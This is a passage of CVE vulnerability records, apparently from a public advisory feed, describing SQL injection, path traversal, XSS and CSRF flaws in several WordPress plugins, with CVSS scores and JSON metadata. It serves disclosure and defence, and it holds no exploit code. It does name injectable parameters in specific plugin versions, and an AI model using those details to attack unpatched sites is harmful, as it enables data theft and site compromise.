The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Severity ?
7.5 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ahmadgb | GeekyBot — AI Copilot, Chatbot, WooCommerce Lead Gen & Zero-Prompt Content |
Affected:
0 , ≤ 1.2.0
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "GeekyBot \u2014 AI Copilot, Chatbot, WooCommerce Lead Gen \u0026 Zero-Prompt Content",
"vendor": "ahmadgb",
"versions": [
{
"lessThanOrEqual": "1.2.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Nguyen Ngoc Duc"
}
],
"descriptions": [
{
"lang": "en",
"value": "The GeekyBot \u2014 Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the \u0027attributekey\u0027 parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T03:37:36.890Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4c716fd3-6297-4b3a-a796-65f68f2986cf?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3474168/geeky-bot"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-02T19:13:32.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T15:06:44.000Z",
"value": "Disclosed"
}
],
"title": "GeekyBot \u2014 Generate AI Content Without Prompt, Chatbot and Lead Generation \u003c= 1.2.0 - Unauthenticated SQL Injection via \u0027attributekey\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-3456",
"datePublished": "2026-05-05T03:37:36.890Z",
"dateReserved": "2026-03-02T18:58:06.506Z",
"dateUpdated": "2026-05-05T03:37:36.890Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-1921 (GCVE-0-2026-1921)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Loco Translate <= 2.8.2 - Authenticated (Translator+) Path Traversal to Limited File Read via 'ref' Parameter
Summary
The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded.
Severity ?
4.9 (Medium)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| timwhitlock | Loco Translate |
Affected:
0 , ≤ 2.8.2
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Loco Translate",
"vendor": "timwhitlock",
"versions": [
{
"lessThanOrEqual": "2.8.2",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Angus Girvan"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:59.132Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12"
},
{
"url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12"
},
{
"url": "https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92"
},
{
"url": "https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php"
},
{
"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2\u0026new_path=%2Floco-translate/tags/2.8.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T13:32:17.000Z",
"value": "Disclosed"
}
],
"title": "Loco Translate \u003c= 2.8.2 - Authenticated (Translator+) Path Traversal to Limited File Read via \u0027ref\u0027 Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-1921",
"datePublished": "2026-05-05T02:26:59.132Z",
"dateReserved": "2026-02-04T17:33:59.876Z",
"dateUpdated": "2026-05-05T02:26:59.132Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5505 (GCVE-0-2026-5505)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
WP-Clippy <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
Summary
The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "WP-Clippy",
"vendor": "bitacre",
"versions": [
{
"lessThanOrEqual": "1.0.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "zakaria"
}
],
"descriptions": [
{
"lang": "en",
"value": "The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:58.744Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec49ed83-a09d-460d-be34-0fb79032b543?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L23"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L23"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L26"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L26"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:06:40.000Z",
"value": "Disclosed"
}
],
"title": "WP-Clippy \u003c= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5505",
"datePublished": "2026-05-05T02:26:58.744Z",
"dateReserved": "2026-04-03T16:08:43.449Z",
"dateUpdated": "2026-05-05T02:26:58.744Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6255 (GCVE-0-2026-6255)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Simple Owl Shortcodes <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'num' Shortcode Attribute
Summary
The Simple Owl Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'num' attribute of the 'owls_wrapper' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| sszdh | Simple Owl Shortcodes |
Affected:
0 , ≤ 2.1.1
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Simple Owl Shortcodes",
"vendor": "sszdh",
"versions": [
{
"lessThanOrEqual": "2.1.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "nail majdeddine"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Simple Owl Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027num\u0027 attribute of the \u0027owls_wrapper\u0027 shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:58.401Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e33a2f27-20c2-4963-9558-1eead0515690?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/tags/2.1.1/inc/owls_wrapper.php#L11"
},
{
"url": "https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/trunk/inc/owls_wrapper.php#L11"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:06:27.000Z",
"value": "Disclosed"
}
],
"title": "Simple Owl Shortcodes \u003c= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027num\u0027 Shortcode Attribute"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6255",
"datePublished": "2026-05-05T02:26:58.401Z",
"dateReserved": "2026-04-13T20:56:16.310Z",
"dateUpdated": "2026-05-05T02:26:58.401Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6704 (GCVE-0-2026-6704)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Blog Settings <= 1.0 - Reflected Cross-Site Scripting via 'page' Parameter
Summary
The Blog Settings plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Severity ?
6.1 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| phpsandeepkumar | Blog Settings |
Affected:
0 , ≤ 1.0
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Blog Settings",
"vendor": "phpsandeepkumar",
"versions": [
{
"lessThanOrEqual": "1.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Julian Chibuike Nwadinobi"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Blog Settings plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u0027page\u0027 parameter in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:58.006Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d28e5374-dd34-4745-a20b-059e9846d96d?source=cve"
},
{
"url": "https://wordpress.org/plugins/blog-settings/"
},
{
"url": "https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L173"
},
{
"url": "https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L46"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:07:42.000Z",
"value": "Disclosed"
}
],
"title": "Blog Settings \u003c= 1.0 - Reflected Cross-Site Scripting via \u0027page\u0027 Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6704",
"datePublished": "2026-05-05T02:26:58.006Z",
"dateReserved": "2026-04-20T17:55:04.098Z",
"dateUpdated": "2026-05-05T02:26:58.006Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-2868 (GCVE-0-2026-2868)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'separatorIconSVG'
Summary
The Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'separatorIconSVG' parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| jegstudio | Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem |
Affected:
0 , ≤ 3.5.3
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem",
"vendor": "jegstudio",
"versions": [
{
"lessThanOrEqual": "3.5.3",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Athiwat Tiprasaharn"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027separatorIconSVG\u0027 parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:57.635Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc540e5c-180f-4743-b1fb-608aa0e3ae79?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3507804/gutenverse"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-02-20T18:23:49.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T14:22:31.000Z",
"value": "Disclosed"
}
],
"title": "Gutenverse \u2013 Ultimate WordPress FSE Blocks Addons \u0026 Ecosystem \u003c= 3.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027separatorIconSVG\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-2868",
"datePublished": "2026-05-05T02:26:57.635Z",
"dateReserved": "2026-02-20T14:31:17.028Z",
"dateUpdated": "2026-05-05T02:26:57.635Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6702 (GCVE-0-2026-6702)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Publish 2 Ping.fm <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting via 'wpPingPingKey' Parameter
Summary
The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the '/wp-admin/options-general.php?page=admin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Severity ?
6.1 (Medium)
CWE
- CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| foux | Publish 2 Ping.fm |
Affected:
0 , ≤ 1.1
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Publish 2 Ping.fm",
"vendor": "foux",
"versions": [
{
"lessThanOrEqual": "1.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Muhammad Nur Ibnu Hubab"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the \u0027/wp-admin/options-general.php?page=admin.php\u0027 page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-352",
"description": "CWE-352 Cross-Site Request Forgery (CSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:57.145Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c0dc5349-139a-4bf3-8503-0e75b132c68c?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L136"
},
{
"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L136"
},
{
"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L76"
},
{
"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L76"
},
{
"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/prefs.php#L219"
},
{
"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/prefs.php#L219"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:07:17.000Z",
"value": "Disclosed"
}
],
"title": "Publish 2 Ping.fm \u003c= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting via \u0027wpPingPingKey\u0027 Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6702",
"datePublished": "2026-05-05T02:26:57.145Z",
"dateReserved": "2026-04-20T17:30:27.953Z",
"dateUpdated": "2026-05-05T02:26:57.145Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6700 (GCVE-0-2026-6700)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
DX Sources <= 2.0.1 - Cross-Site Request Forgery to Settings Update
Summary
The DX Sources plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the settings_page_build function. This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a forged request that modifies the plugin's configuration options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Severity ?
4.3 (Medium)
CWE
- CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| xavortm | DX Sources |
Affected:
0 , ≤ 2.0.1
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "DX Sources",
"vendor": "xavortm",
"versions": [
{
"lessThanOrEqual": "2.0.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Muhammad Afnaan"
}
],
"descriptions": [
{
"lang": "en",
"value": "The DX Sources plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the settings_page_build function. This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a forged request that modifies the plugin\u0027s configuration options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-352",
"description": "CWE-352 Cross-Site Request Forgery (CSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:56.787Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c96e57-0300-4ea7-a0c6-5d060b6e979d?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L46"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L46"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L79"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L79"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:06:52.000Z",
"value": "Disclosed"
}
],
"title": "DX Sources \u003c= 2.0.1 - Cross-Site Request Forgery to Settings Update"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6700",
"datePublished": "2026-05-05T02:26:56.787Z",
"dateReserved": "2026-04-20T17:26:47.833Z",
"dateUpdated": "2026-05-05T02:26:56.787Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5247 (GCVE-0-2026-5247)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories <= 4.10.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'wrapper' Shortcode Attribute
Summary
The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wrapper' attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors.
Severity ?
5.5 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| publishpress | Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories |
Affected:
0 , ≤ 4.10.0
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories",
"vendor": "publishpress",
"versions": [
{
"lessThanOrEqual": "4.10.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Djaidja Moundjid"
}
],
"descriptions": [
{
"lang": "en",
